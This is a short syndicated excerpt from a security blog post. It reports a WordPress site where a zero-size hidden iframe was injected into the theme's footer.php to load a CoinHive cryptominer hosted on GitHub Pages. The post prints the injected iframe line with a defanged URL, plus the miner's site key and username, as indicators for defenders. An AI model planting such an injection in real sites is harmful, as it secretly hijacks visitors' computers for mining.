Malicious Cryptominers from GitHub

Malicious Cryptominers from GitHub

Recently, a webmaster contacted us when his AVG antivirus reported that the JS:Miner-C [Trj] infection was found on their site.

Our investigation revealed a hidden iframe had been injected into the theme’s footer.php file:

<iframe src=”hxxps://wpupdates.github[.]io/ping/” style=”width:0;heigh:0;border:none;”></iframe>

When we opened the URL in a browser, the page was blank.

After checking the HTML source code, we discovered a piece of JavaScript using the CoinHive miner with the site key, CZziRExmOxYEE65Hm4E9fycCuNqZH1G9 and the username, MoneroU.

Continue reading Malicious Cryptominers from GitHub at Sucuri Blog.

*** This is a Security Bloggers Network syndicated blog from Sucuri Blog authored by Denis Sinegubko. Read the original post at: https://blog.sucuri.net/2017/12/malicious-cryptominers-from-github.html